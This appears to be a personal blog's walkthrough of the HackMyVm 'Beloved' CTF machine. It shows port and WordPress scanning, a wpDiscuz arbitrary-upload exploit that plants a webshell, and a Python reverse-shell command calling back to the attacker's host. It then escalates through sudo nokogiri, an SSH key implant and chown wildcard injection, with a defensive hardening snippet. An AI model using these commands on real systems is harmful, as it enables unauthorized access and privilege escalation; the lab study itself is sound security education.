Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Beloved Walkthrough (chown wildcard injection)

HackMyVm Beloved Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan all ports with service and script detection.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is WordPress. Add beloved to /etc/hosts, then search for vulnerabilities with wpscan (aggressive plugin detection).

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exploit-db for wpDiscuz with searchsploit.

 ~ searchsploit wpdiscuz
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ ---------------------------------

Run the PoC script (49967.py) against the site, pointing it at a post that has comments enabled.

 ~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/
 ---------------------------------------------------------------
 [-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
 [-] File Upload Bypass Vulnerability - PHP Webshell Upload
 [-] CVE: CVE-2020-24186
 [-] https://github.com/hevox
 ---------------------------------------------------------------
 
 [+] Response length:[51680] | code:[200]
 [!] Got wmuSecurity value: 9c794f21e7
 [!] Got wmuSecurity value: 1
 
 [+] Generating random name for Webshell...
 [!] Generated webshell name: bhgnpbentfvkgzh
 
 [!] Trying to Upload Webshell..
 [+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php"

Start a listener on port 1234, then visit the uploaded webshell with the command below to get a reverse shell.

 http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

Check sudo -l as www-data.

 www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

nokogiri drops into an interactive Ruby shell, but the trick is that it needs an extra argument: a file to parse. Any file will do, so we pass an empty log file.

 www-data@beloved:/$ touch /tmp/log.txt
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'

Now we are beloved. Upload our id_rsa.pub into ~/.ssh as authorized_keys to get SSH access.

 cd .ssh
 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 --2021-07-02 06:44:36--  http://192.168.56.150/id_rsa.pub
 Connecting to 192.168.56.150:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 565 [application/x-mspublisher]
 Saving to: ‘authorized_keys’
 ...
 chmod 600 authorized_keys

SSH in as beloved.

 ~ ssh beloved@192.168.56.100
 ...
 beloved@beloved:~$ id
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)

Run pspy64 to watch for scheduled processes. A root cron job runs chown with a wildcard in /opt every minute.

 2021/07/02 06:47:01 CMD: UID=0    PID=1878   | /usr/sbin/CRON -f
 2021/07/02 06:47:01 CMD: UID=0    PID=1879   | /bin/sh -c cd /opt && chown root:root *

In /opt there is only an id_rsa, which is probably root's private key. The directory is writable by group beloved, but the file itself is owned by root with mode 600, so we need to make it readable by beloved.

 beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use the chown wildcard injection. Because the shell expands * before chown sees its arguments, a file named --reference=ref is passed to chown as an option, and chown then copies the owner and group of ref onto every other file in the directory. See the article here.

 beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

Wait a minute for the cron job to run. id_rsa now belongs to beloved, the owner of the file ref.

 beloved@beloved:/opt$ ls -la
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:59  .
 drwxr-xr-x 18 root    root    4096 May 19 10:09  ..
 -rw-------  1 beloved beloved 1823 Jun 27 16:41  id_rsa
 -rw-r--r--  1 beloved beloved    0 Jul  2 06:58  ref
 -rw-r--r--  1 beloved beloved    0 Jul  2 06:59 '--reference=ref'
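To see exactly why the cron job above is dangerous and what the fixed command looks like, here is an added example (not from the original post) that reproduces the glob expansion in a throwaway directory without touching /opt and without needing root. It assumes a POSIX sh with mktemp; the file names are constructed to mirror the listing above.

```shell
#!/bin/sh
# Added example: model the '/bin/sh -c cd /opt && chown root:root *' cron job.
# No real chown is performed; we only show what argv the shell builds for it.

# Build a sandbox that mimics /opt: the target file plus the two planted files.
setup_sandbox() {
    d=$(mktemp -d)
    : > "$d/id_rsa"
    : > "$d/ref"
    : > "$d/--reference=ref"   # constructed: a filename that chown reads as an option
    printf '%s\n' "$d"
}

# Unsafe form, one argument per line. '--reference=ref' arrives bare, so chown
# parses it as --reference and copies ref's owner/group onto id_rsa.
unsafe_argv() {
    ( cd "$1" && printf '%s\n' * )
}

# Hardened form: prefix the glob with ./ so no argument can start with '-'.
# (Equivalent fix: 'chown root:root -- *', which ends option parsing.)
hardened_argv() {
    ( cd "$1" && printf '%s\n' ./* )
}

# Audit helper for defenders: flag entries whose names start with '-' in a
# directory that a wildcard cron job processes. Returns 1 if any are found.
audit_dashed_names() {
    found=0
    for f in "$1"/*; do
        name=${f##*/}
        case "$name" in
            -*) printf 'suspicious name in %s: %s\n' "$1" "$name"; found=1 ;;
        esac
    done
    return $found
}
```

Run setup_sandbox, then compare unsafe_argv and hardened_argv on the returned path: only the hardened form keeps every argument path-shaped, and audit_dashed_names fails until the planted file is removed.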

Read id_rsa, save it locally as key, and log in over SSH as root.

 ~ ssh root@192.168.56.100 -i key
 ...
 root@beloved:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 beloved
